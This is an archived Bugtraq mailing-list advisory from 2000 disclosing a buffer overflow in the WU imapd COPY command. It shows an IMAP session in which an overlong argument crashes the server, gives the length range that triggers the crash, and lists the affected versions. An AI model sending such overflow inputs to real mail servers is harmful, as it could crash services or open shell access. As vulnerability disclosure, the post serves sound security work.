Bugtraq mailing list archives
another WU imapd buffer overflow
From: siva9 () CLICO PL (Michal Szymanski)
Date: Fri, 21 Apr 2000 02:12:18 +0200
Hi, While doing code security audit, I discovered another buffer overflow in imapd. This time security flaw exist in standard rfc 1064 COPY command: * OK mail IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * select inbox * 2 EXISTS * 0 RECENT * OK [UIDVALIDITY 956162550] UID validity status * OK [UIDNEXT 5] Predicted next UID * FLAGS (\Answered \Flagged \Deleted \Draft \Seen) * OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent * flags * OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9 * OK [READ-WRITE] SELECT completed * copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's] No answer. Process has been killed by SIGSEGV. Number of A's must be in range from 1017 to 8180. After LOGIN all privileges are dropped, but we still have possibility to get unprivileged shell access. I've tested it against WU imapd v10.223, v11.241, v12.250, v12.261, and v12.264. Regards, Michal Szymanski [michal_szymanski () linux com pl];
Current thread:
- Re: Reappearance of an old IE security bug Elias Levy (Apr 19)
- Re: Reappearance of an old IE security bug Darren Reed (Apr 19)
- DOS attack against HP JetDirect Printers (fwd) Alfred Huger (Apr 20)
- Re: DOS attack against HP JetDirect Printers (fwd) Hobbes Gobs Llin (Apr 20)
- another WU imapd buffer overflow Michal Szymanski (Apr 20)
- Re: DOS attack against HP JetDirect Printers (fwd) Gwendolynn ferch Elydyr (Apr 20)
- Re: DOS attack against HP JetDirect Printers (fwd) Ben Woodard (Apr 21)
- local user can delete arbitrary files on SuSE-Linux Peter Münster (Apr 20)
- Re: local user can delete arbitrary files on SuSE-Linux Pavel Kankovsky (Apr 22)
- Re: DOS attack against HP JetDirect Printers (fwd) Terran Melconian (Apr 21)